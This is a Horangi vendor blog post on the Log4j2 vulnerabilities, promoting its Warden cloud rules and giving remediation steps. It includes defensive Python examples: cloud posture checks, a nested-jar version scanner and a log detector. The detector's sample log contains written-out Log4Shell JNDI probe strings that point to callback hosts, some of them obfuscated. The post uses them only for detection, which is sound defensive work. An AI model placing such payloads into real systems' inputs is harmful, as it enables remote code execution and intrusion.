
Log4j2 Vulnerability: Horangi Is Here To Help With New And Updated Warden Rules

Automate Log4j2 Vulnerability Checks and Reduce Chances of Log4j2 Exploits with New and Updated Rules on Warden While You Apply Patches and Install Updates

UPDATE: This blog was first published on 23 December, 2021, and has been updated to include the release of Log4j version 2.17.1 to address a new vulnerability.

Update: Apache Releases Log4j Version 2.17.1 To Address New Vulnerability

Apache released Log4j 2.17.1 on 27 December 2021 to address a new vulnerability, CVE-2021-44832.

According to the Log4j project website, “Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.”

CVE-2021-44832 has a base CVSS score of 6.6 and is not rated critical: to exploit it, an attacker must already be able to modify the logging configuration file on your server, which normally means administrative access.

If most of your Log4j instances are already on version 2.17.0, you may defer the move to 2.17.1 until the other recommended updates and patches are in place. If older versions remain, go straight to 2.17.1 for all of them.

Warden Now Has Rules To Make Exploitation Less Likely

We updated some existing rules and added new rules on Warden that identify vulnerable workloads and add layers of protection to help make Log4j2 exploitation less likely.

Warden, Horangi's flagship cloud security platform to protect infrastructure and permissions, now comes with these new rules:

  • ElasticSearch/OpenSearch Version Vulnerable to Apache Log4j2 Vulnerability (CVE-2021-44228): Detect vulnerable ElasticSearch/OpenSearch Domains
  • Enable Global WAF Web ACLs for Protection Against Apache Log4j2 Vulnerabilities: Enable Global WAF Web ACLs to block Log4j2 attacks
  • Enable Regional WAF Web ACLs for Protection Against Apache Log4j2 Vulnerabilities: Enable Regional WAF Web ACLs to block Log4j2 attacks

These updated rules on Warden act as defense-in-depth to break the chain of attack in the event a vulnerable Log4j2 instance exists:

  • Network ACL Inbound Traffic Not Restricted (AWS): Prevent connection from public to EC2 instances
  • Network ACL Outbound Traffic Not Restricted (AWS): Compromised EC2 instance with unrestricted outbound access may result in data exfiltration
  • ElasticSearch Domain Publicly Accessible to the Internet (AWS): Unpatched ElasticSearch domains may be compromised.
  • Elasticsearch Exposed Domains (AWS): Unpatched ElasticSearch domains may be compromised.
  • Default EC2 Security Groups in Use (AWS): Compromised EC2 instances with default EC2 security group with unrestricted outbound access may result in data exfiltration
  • Ensure the Default Security Group Restricts All Traffic (Huawei): Compromised ECS instance with unrestricted outbound access may result in data exfiltration
  • Ensure that Access is Restricted from the Internet to All Ports (GCP): Prevent connection from public to Compute instances

All new and updated rules are immediately available to users of Warden.
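To make concrete what rules of this kind check, here is an added example written for this post, not Warden's own rule code: three checks evaluated offline over constructed data shaped like the AWS API responses for a WAF Web ACL, a security group and a network ACL. The rule-group name AWSManagedRulesKnownBadInputsRuleSet and its Log4JRCE rule are AWS's; the resource names, the sample values and the evaluate() wrapper are assumptions made for the example.

```python
# Added example for this article (not Horangi's rule code): posture checks of the
# kind listed above, run over constructed data shaped like the JSON returned by
# `aws wafv2 get-web-acl`, `aws ec2 describe-security-groups` and
# `aws ec2 describe-network-acls`. Field names follow the AWS API; values are made up.

# AWS managed rule group to which AWS added its Log4JRCE rule in December 2021.
KNOWN_BAD_INPUTS = "AWSManagedRulesKnownBadInputsRuleSet"
ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"


def waf_blocks_log4j(web_acl: dict) -> bool:
    """True if the Web ACL applies KnownBadInputs in blocking mode and has not
    disabled its Log4JRCE rule via ExcludedRules or a Count override."""
    for rule in web_acl.get("Rules", []):
        stmt = rule.get("Statement", {}).get("ManagedRuleGroupStatement")
        if not stmt or stmt.get("Name") != KNOWN_BAD_INPUTS:
            continue
        if "Count" in rule.get("OverrideAction", {}):
            continue  # the whole group only counts matches, it never blocks
        if any(e["Name"] == "Log4JRCE" for e in stmt.get("ExcludedRules", [])):
            continue  # legacy way of switching one rule to count-only
        overrides = {o["Name"]: o["ActionToUse"] for o in stmt.get("RuleActionOverrides", [])}
        if "Count" in overrides.get("Log4JRCE", {}):
            continue  # current way of switching one rule to count-only
        return True
    return False


def sg_open_egress(sg: dict) -> bool:
    """True if any egress permission reaches the whole internet: a compromised
    host behind such a group can fetch a second stage and exfiltrate data."""
    for perm in sg.get("IpPermissionsEgress", []):
        v4 = [r["CidrIp"] for r in perm.get("IpRanges", [])]
        v6 = [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
        if ANY_V4 in v4 or ANY_V6 in v6:
            return True
    return False


def nacl_open(nacl: dict, egress: bool) -> bool:
    """Network ACL entries are evaluated in ascending RuleNumber order and the
    first match wins, so the first all-protocol, any-address entry decides."""
    entries = sorted((e for e in nacl.get("Entries", []) if e["Egress"] == egress),
                     key=lambda e: e["RuleNumber"])
    for e in entries:
        cidr = e.get("CidrBlock") or e.get("Ipv6CidrBlock")
        if e["Protocol"] == "-1" and cidr in (ANY_V4, ANY_V6):
            return e["RuleAction"] == "allow"
    return False


def evaluate(snapshot: dict) -> list:
    """Run all checks over an account snapshot and return finding titles."""
    findings = []
    for acl in snapshot.get("web_acls", []):
        if not waf_blocks_log4j(acl):
            findings.append(f"WAF Web ACL {acl['Name']}: not blocking Log4j2 payloads")
    for sg in snapshot.get("security_groups", []):
        if sg_open_egress(sg):
            findings.append(f"Security group {sg['GroupId']}: outbound traffic not restricted")
    for nacl in snapshot.get("network_acls", []):
        if nacl_open(nacl, egress=True):
            findings.append(f"Network ACL {nacl['NetworkAclId']}: outbound traffic not restricted")
        if nacl_open(nacl, egress=False):
            findings.append(f"Network ACL {nacl['NetworkAclId']}: inbound traffic not restricted")
    return findings


# Constructed sample: one count-only Web ACL, one blocking; a default-style
# security group and network ACL (allow-all plus the trailing deny-all entries).
SAMPLE = {
    "web_acls": [
        {"Name": "edge-count-only", "Rules": [{
            "Name": "kbi", "OverrideAction": {"Count": {}},
            "Statement": {"ManagedRuleGroupStatement": {
                "VendorName": "AWS", "Name": KNOWN_BAD_INPUTS}}}]},
        {"Name": "edge-blocking", "Rules": [{
            "Name": "kbi", "OverrideAction": {"None": {}},
            "Statement": {"ManagedRuleGroupStatement": {
                "VendorName": "AWS", "Name": KNOWN_BAD_INPUTS}}}]},
    ],
    "security_groups": [
        {"GroupId": "sg-default", "IpPermissionsEgress": [
            {"IpProtocol": "-1", "IpRanges": [{"CidrIp": ANY_V4}], "Ipv6Ranges": []}]},
        {"GroupId": "sg-locked", "IpPermissionsEgress": [
            {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
             "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []}]},
    ],
    "network_acls": [
        {"NetworkAclId": "acl-default", "Entries": [
            {"RuleNumber": 100, "Egress": True, "Protocol": "-1", "CidrBlock": ANY_V4, "RuleAction": "allow"},
            {"RuleNumber": 100, "Egress": False, "Protocol": "-1", "CidrBlock": ANY_V4, "RuleAction": "allow"},
            {"RuleNumber": 32767, "Egress": True, "Protocol": "-1", "CidrBlock": ANY_V4, "RuleAction": "deny"},
            {"RuleNumber": 32767, "Egress": False, "Protocol": "-1", "CidrBlock": ANY_V4, "RuleAction": "deny"},
        ]},
    ],
}

if __name__ == "__main__":
    for finding in evaluate(SAMPLE):
        print(finding)
```

Note that a Web ACL whose managed group is set to Count passes a naive "is the rule group attached?" check while blocking nothing, which is why the example inspects the override action rather than just the group name.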

While the new and updated rules provide some level of protection, they are not a substitute for patching: threat actors and Ransomware-as-a-Service (RaaS) providers are always looking for new ways to exploit the vulnerability.

5 Ways To Stay Safe

1. Update Log4j2 and apply vendor patches

Update your Log4j2 to version 2.17.1, and also apply any patches from your vendors that address the Log4j2 vulnerability.

Unfortunately, just updating Log4j2 to version 2.17.1 is not as straightforward as it seems. You may face two major difficulties in comprehensively remediating the vulnerability:

  1. Log4j2 may be deeply embedded in applications, several layers down in some cases (for example as a transitive dependency, or as a jar bundled inside a WAR or fat JAR), so a version check of the top-level application alone can miss it.
  2. Threat actors can use unpatched vulnerabilities in your customers', partners' or suppliers' systems to attack you. Warden's updated rules act as defense-in-depth to break this chain of attack if a vulnerable Log4j2 instance exists.
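The version range quoted from the Apache advisory above and the "several layers down" problem together describe a check worth automating. The script below is an added example written for this post, not Horangi's or Apache's code: it walks a directory, opens every archive, recurses into archives nested inside archives, reads the log4j-core version from the jar's Maven pom.properties and flags versions in the CVE-2021-44832 range. The sample WAR it builds is a constructed fixture with no real Log4j bytecode, and the version parser covers only the numeric, -beta and -rc forms Log4j 2 has used.

```python
# Added example (not Horangi's code): find log4j-core inside application archives,
# including jars nested in WARs/EARs/fat JARs, and flag versions in the range the
# Apache advisory gives for CVE-2021-44832. The sample WAR built at the bottom is a
# constructed fixture containing no real Log4j bytecode.
import io
import re
import sys
import zipfile
from pathlib import Path

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Maven metadata that published log4j-core jars carry.
POM_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
# Package prefix of Log4j core classes; present even when pom.properties was stripped.
CORE_MARKER = "org/apache/logging/log4j/core/"
PRE_RANK = {"beta": 0, "rc": 1, None: 2}  # 2.0-beta7 < 2.0-rc1 < 2.0

def parse_version(v: str):
    """'2.0-beta7' -> (2, 0, 0, 0, 7); '2.17.1' -> (2, 17, 1, 2, 0); None if unparseable."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", v)
    if not m:
        return None
    major, minor, patch, pre, pre_num = m.groups()
    return (int(major), int(minor), int(patch or 0), PRE_RANK[pre], int(pre_num or 0))

def vulnerable_44832(version: str) -> bool:
    """Apache: 2.0-beta7 through 2.17.0 affected, except fix releases 2.3.2 and 2.12.4."""
    if version in ("2.3.2", "2.12.4"):
        return False
    v = parse_version(version)
    if v is None:
        return True  # unknown version string: treat as suspect and let a human look
    return parse_version("2.0-beta7") <= v <= parse_version("2.17.0")

def scan_archive(data: bytes, label: str, depth: int = 0) -> list:
    """Return (location, version, vulnerable) for each log4j-core in an archive,
    descending into nested archives ("outer.war!WEB-INF/lib/inner.jar")."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = zf.namelist()
        pom_found = False
        for name in names:
            if POM_RE.search(name):
                pom_found = True
                props = zf.read(name).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = m.group(1).strip() if m else "unknown"
                findings.append((label, version, vulnerable_44832(version)))
            elif name.lower().endswith(ARCHIVE_SUFFIXES) and depth < 8:
                findings += scan_archive(zf.read(name), f"{label}!{name}", depth + 1)
        # Shaded builds may drop the Maven metadata but still ship the classes.
        if not pom_found and any(n.startswith(CORE_MARKER) for n in names):
            findings.append((label, "unknown (shaded)", True))
    return findings

def scan_tree(root) -> list:
    """Scan every archive below a directory, e.g. an application server's deploy dir."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings += scan_archive(path.read_bytes(), str(path))
    return findings

def _zip(files: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()

def build_sample_war() -> bytes:
    """Constructed fixture: a WAR bundling one vulnerable and one fixed log4j-core jar."""
    def core(version):
        return _zip({
            "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties":
                f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
            "org/apache/logging/log4j/core/lookup/JndiLookup.class": b"",
        })
    return _zip({
        "WEB-INF/lib/log4j-core-2.14.1.jar": core("2.14.1"),
        "WEB-INF/lib/legacy/log4j-core-2.17.1.jar": core("2.17.1"),
        "WEB-INF/classes/app.properties": "greeting=hello\n",
    })

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_archive(build_sample_war(), "app.war")
    for location, version, vuln in results:
        print(f"{'VULNERABLE' if vuln else 'ok'}\t{version}\t{location}")
```

Run it with a directory argument to scan real deployments; without one it scans the constructed WAR. The nested-archive recursion is what catches the "several layers down" case, and the shaded-build fallback reports a jar that has Log4j core classes but no version metadata as suspect rather than silently skipping it.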

2. Source code review

Use commercial or open-source tools, or engage professional services, to review your Java source code and build manifests so that you find every place Log4j2 is used or pulled in as a dependency and confirm that each one is on a patched version.

3. Active scanning

Deploy commercial scanners or open-source tools to test your exposed endpoints for the vulnerability. You can also engage professional services such as penetration testing or red teaming to assist with these scans.

4. Check for residual risks

Threat actors may have compromised your infrastructure in the window between public disclosure of the vulnerability and your deployment of the Log4j2 update and vendor patches. Conduct a compromise assessment to hunt for and eradicate residual threats.
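One concrete input to such a compromise assessment is a hunt through web server access logs for the JNDI lookup strings used to probe for CVE-2021-44228, the vulnerability the Warden rules above target. The detector below is an added example written for this post, not Horangi's tooling: it URL-decodes each line, unwinds the ${lower:...}, ${upper:...} and ${...:-x} lookup tricks attackers use to hide the word "jndi" from naive string matching, and then reports the scheme of the lookup. The log lines are constructed for the example and use documentation IP ranges and domains.

```python
# Added example (not Horangi's code): hunt web access logs for Log4Shell
# (CVE-2021-44228) probe strings, including URL-encoded and lookup-obfuscated
# variants, as one input to a compromise assessment.
import re
from urllib.parse import unquote

# Innermost lookups only (no '${' inside), resolved repeatedly from the inside out.
LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.I)


def normalize(s: str, rounds: int = 10) -> str:
    """Undo the obfuscations used to hide 'jndi' from naive matching."""
    s = unquote(unquote(s))  # double-decode: payloads are often encoded twice
    for _ in range(rounds):
        new = LOWER.sub(lambda m: m.group(1).lower(), s)
        new = UPPER.sub(lambda m: m.group(1).upper(), new)
        new = DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_probes(lines) -> list:
    """Return (line_number, scheme, decoded_snippet) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm[m.start():m.start() + 60]))
    return hits


# Constructed sample access log (combined format): a plain probe, one hidden in the
# User-Agent with ${lower:} tricks, one URL-encoded with a ${::-j} trick, one benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:23:15:02 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.7 - - [11/Dec/2021:04:01:17 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.9:1389/x}"',
    '203.0.113.12 - - [12/Dec/2021:09:44:51 +0000] "GET /api?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Dec/2021:10:00:00 +0000] "GET /docs/${version}/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, snippet in find_probes(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme} payload={snippet}")
```

A hit is evidence of an attempt, not of success; the next step is to pivot on the callback host and port in the decoded payload and look for matching outbound connections from the web tier (exactly what the unrestricted-egress checks above are meant to prevent).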

5. Reduce chances of exploitation with Horangi Warden

Warden now includes new and updated rules in the automated scans to: 

  1. Detect vulnerable ElasticSearch/OpenSearch Domains
  2. Enforce WAF ACLs to protect against Log4j2 vulnerability exploitation while you continue patching
  3. Act as defense-in-depth to break the chain of attack in the event a vulnerable Log4j2 instance exists

Our professional services team are currently engaging our existing penetration testing customers to help check for and remediate the Log4j2 vulnerability. 

The Long-Term Solution: A Healthy Cybersecurity Posture

It will take some time to remediate the Log4j2 vulnerability and its repercussions. 

Dozens of commercial and open-source applications and service providers, including Amazon, Microsoft, IBM and Google, use the open-source library in their offerings.

As long as there are cybercriminals, vulnerabilities and exploits will be part of our lives. The best long-term solution remains achieving and maintaining a healthy cybersecurity posture.

However, that’s easier said than done. Hiring and retaining qualified cybersecurity professionals can both be difficult and expensive with the worldwide shortage of such personnel.

One of the best ways to overcome that is through automation — you can deploy Cloud Security Posture Management (CSPM) and Cloud Infrastructure Entitlements Management (CIEM) tools to automate compliance checks and threat detection. 

Warden is Horangi’s agentless and multi-cloud CSPM and CIEM tool that comes with built-in compliance automation recognized by Gartner, Threat Detection, Vulnerability Remediation, and DevSecOps integration to help you achieve a healthy cybersecurity posture. 

Trusted by companies such as NalaGenetics, Singlife, Veraset and Gnowbe, Warden reduces IaaS security risks by up to 80%, provides 10 times faster compliance audit and evidence, and helps reduce cybersecurity overheads by up to 70%. You can install it in about 10 minutes and immediately enable full asset discovery and management.

Automated compliance checks on Warden include both international and Asia-specific compliance standards such as Singapore's MAS-TRM and Indonesia's OJK. Coupled with one-click compliance reporting, you are audit-ready all the time. Threat detection is based on the MITRE ATT&CK framework, and Warden offers playbook, Terraform, manual and one-click remediation options to help you remediate with confidence.

Warden is supported on Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, Alibaba Cloud, and Huawei Cloud.

If you are looking for protection against the Log4j2 vulnerability today and want to achieve a healthy cybersecurity posture in the future, contact us for a demo or sign up for a 14-day trial.

Isaiah Chua

Isaiah Chua is a Content Marketing Manager at Horangi who is also the producer of the Ask A CISO podcast. He's an avid reader who can't get by a day without good music and gallons of coffee.
